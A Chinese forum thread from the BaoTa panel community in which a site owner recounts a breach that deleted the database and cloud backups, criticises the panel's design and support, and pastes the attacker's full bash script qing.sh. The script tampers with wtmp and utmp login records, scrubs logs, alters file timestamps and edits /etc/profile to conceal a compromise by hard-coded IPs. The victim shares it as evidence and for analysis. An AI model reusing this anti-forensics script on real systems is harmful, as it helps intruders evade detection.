【疑难】关于我的网站被黑，发现的一些问题

事情经过
8.3日，宝塔防篡改插件到期，没注意续费，给了黑客可乘之机。8.4号我及时续费，但是购买了两次，一直显示没购买。经过两个小时的折腾，在宝塔客服的帮助下，我成功安装了插件。
并让客服帮忙把两笔购买，退掉任意一笔，由于退款那边下班了，只能等明天了，客服让我明天注意看退款。
晚上我放心的睡了，第二天一醒来，网站被黑，数据库被删干净了，我成功的失业了。
备注：连同我腾讯云cos的云备份，都删了，一个不留。

排查原因
经过排查，宝塔的防篡改插件，被莫名其妙到期了，卸载了。我看了客服留言，说是退了两笔，让我重新购买。

挂马排查
网站被传了一个无后缀文件，一个sh文件。具体文件我已经放在附件了。

网站本身有上传漏洞，注入漏洞，这个是我的原因，但是宝塔本身有一些莫名其妙的问题，是不是应该反思一下

最后建议
1.宝塔设置了腾讯云cos备份，黑客居然能通过一些手段，把云备份都给删了。
我测试了一下，直接在宝塔里，就可以通过备份记录，把云备份给删了。那么这个备份和本地备份有什么区别，为什么要给这个删除权限。

2.之前我也设置了防篡改，黑客依然能不停的创建带 .的空文件夹，一直在尝试攻击
为什么防篡改的情况下，还能创建文件夹，这个是设计缺陷吗？离谱的是，黑客传了sh文件，执行了获取一些密码的命令，这个是怎么做到的？

3.宝塔做为一款这么经久不衰的运维工具，客服效率是不是应该提升一下？处理客户一些问题的方式，是不是有些欠妥？

官方也不用联系我了，该说的问题都说了，心灰意冷。以后我还是会用宝塔，只是不会再用宝塔去搭建商业网站了。也不会再付费了。

宝塔用户_doyumq · 发表于 2022-8-5 20:38:32

文件名
qing.sh

代码如下

#!/bin/bash
rm -f qing.sh*
rm -f hide_centos7*.sh*
user2=$(last -a | grep -v "root\|reboot\|system\|boot"|sed -n '1p' | awk '{print $1}')
user3=$(last -a | grep -v "root\|reboot\|$user2\|system\|boot"|sed -n '1p' | awk '{print $1}')
chattr -i /var/log/wtmp ; chattr -i /root/.bash_history ; chattr -i /home/$user2/.bash_history ; rm -f /tmp/.font-unix/so.bak ;rm -f /usr/local/sbin/jon ;
ipset4='mysql1'
ipset3='18.162.213.72'
ipset2='localhost'

ipset='43.154.131.34'

ip=$(last -a |sed -n '1p' | awk '{print $10}')
user=$(last -a |sed -n '1p' | awk '{print $1}')
tip=$(last |sed -n '1p' | awk '{print $3}')
time=$(who /var/log/wtmp | sed -n '$p' | awk '{print $3,$4}' )
sjc=$(date -d "$time" +%s)
riqi=$(date -d @$sjc "+%Y:%m:%d:%H:%M:%S")
if [[ $tip = $ipset ]]; then
nl-addr -w $user $ipset
nl-addr -f /var/log/wtmp -w $user $ipset
nl-addr -u $user $ipset
nl-addr -f /run/utmp -u $user $ipset
fi

if [[ $tip = $ipset2 ]]; then
nl-addr -w $user $ipset2
nl-addr -f /var/log/wtmp -w $user $ipset2
nl-addr -u $user $ipset2
nl-addr -f /run/utmp -u $user $ipset2
fi
if [[ $tip = $ipset3 ]]; then
nl-addr -w $user $ipset3
nl-addr -f /var/log/wtmp -w $user $ipset3
nl-addr -u $user $ipset3
nl-addr -f /run/utmp -u $user $ipset3
fi
if [[ $tip = $ipset4 ]]; then
nl-addr -w $user $ipset4
nl-addr -f /var/log/wtmp -w $user $ipset4
nl-addr -u $user $ipset4
nl-addr -f /run/utmp -u $user $ipset4
fi

tip3=$(last |sed -n '1p' | awk '{print $3}')
time2=$(who /var/log/wtmp | sed -n '$p' | awk '{print $3}' )
#sed -i '/'$time2'/d' /var/log/dpkg.log* ;
#sed -i '/'$ipset'/d' /var/log/secure* ;
#sed -i '/'$ipset'/d' /var/log/audit/audit.* ;
#sed -i '/'$ipset'/d' /www/wwwlogs/access.* ;
#sed -i '/'error:'/d' /var/log/messages ;
#sed -i '/'systemd-logind:'/d' /var/log/messages ;
#sed -i '/'$ipset'/d' /var/log/auth.log* ;
#sed -i '/'kernel-'/d' /var/log/messages* ;
#sed -i '/'ipaddr:'/d' /var/log/messages* ;

kill -9 $(/usr/lib/ps -ef | grep rpm.sh | grep -v grep | awk '{print $2}') >/dev/null 2>&1
#kill -9 $(ps -ef | grep sftp-server | grep -v grep | awk '{print $2}') >/dev/null 2>&1

cd /etc
pro="chmod +x /usr/lib/"
ls="ls | grep"
pro=${pro//\//\\\/}
sid="setsid /usr/lib/rpm/rpm"
sid=${sid//\//\\\/}

sid2="setsid /usr/lib/apt/apt"
sid2=${sid2//\//\\\/}
sed -i '/'"$ls"'/,+3d' /etc/profile >/dev/null 2>&1
sed -i '/'"${pro}"'/,+2d' /etc/profile >/dev/null 2>&1
sed -i '/'"${sid}"'/,+1d' /etc/profile >/dev/null 2>&1
sed -i '/'"${sid2}"'/,+1d' /etc/profile >/dev/null 2>&1

touch -r /etc/* /usr/lib
touch -r /etc/* /usr/
touch -r /etc/* /usr/bin
touch -r /etc/* /usr/sbin
touch -r /etc/* /bin
touch -r /etc/* /tmp/.font-unix

tip2=$(last |sed -n '1p' | awk '{print $3}')
if [[ "$tip2" = "" ]]; then
nl-addr -m $user localhost tty1 $riqi
echo nl-addr -m $user localhost tty1 $riqi
else
nl-addr -m $user $tip2 tty1 $riqi
echo nl-addr -m $user $tip2 tty1 $riqi
fi

echo
echo 这里查看/root/.bash_history操作记录中有没有自己的记录---------------------------最近5条
echo
cat /root/.bash_history |tail -n 5
echo
user2=$(last -a | grep -v "root\|reboot\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user2 != "" ]]; then
echo 这里查看/root/$user2 的用户操作记录---------------------------------------------最近5条
cat /home/$user2/.bash_history |tail -n 5
fi
echo
user3=$(last -a | grep -v "root\|reboot\|$user2\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user3 != "" ]]; then
echo 这里查看/root/$user3 的用户操作记录---------------------------------------------最近5条
cat /home/$user3/.bash_history |tail -n 5
fi

echo
user4=$(last -a | grep -v "root\|reboot\|$user2\|$user3\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user4 != "" ]]; then
echo 这里查看/root/$user4 的用户操作记录---------------------------------------------最近5条
cat /home/$user4/.bash_history |tail -n 5
fi
user5=$(last -a | grep -v "root\|reboot\|$user2\|$user3\|$user4\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user5 != "" ]]; then
echo 这里查看/root/$user5 的用户操作记录---------------------------------------------最近5条
cat /home/$user5/.bash_history |tail -n 5
fi
echo 这里是查看last的最新登录ip是不是别人的---------------------------------------显示前三条登录记录
last -a | head -n 3
echo
ps aux | grep "12:9\|7:8\|7:9" | grep -v grep

宝塔用户_doyumq · 发表于 2022-8-5 20:40:25

文件名
zipFLIvo

代码太长了，贴不出来，经过加密的，也看不出所以然来

全互云 · 发表于 2022-8-6 10:39:55

关于备份被清理掉问题，建议远程备份用阿里oss（做好相关设置后）就不怕被清理了，七牛和腾讯的cos没有研究过

█菠萝云买2送1活动！12G内存99元	阿里云国际低折扣多云自助平台	APP分发-无行业限制免审核	A4招租，联系qq394030111	A5招租，联系qq394030111
高防服务器，无视一切流量攻击	【阿里云】宝塔一键部署，低至5折	A8招租，联系qq394030111	【阿里云】宝塔一键部署，低至5折	OV/EV SSL证书，可当日签发
█ 易探云·香港/美国vps仅9元 █	▶CPS云◀海外大带宽vps服务器	OV/EV SSL证书，可当日签发	【云防护】专注域名和网站安全防护	A15招租，联系qq394030111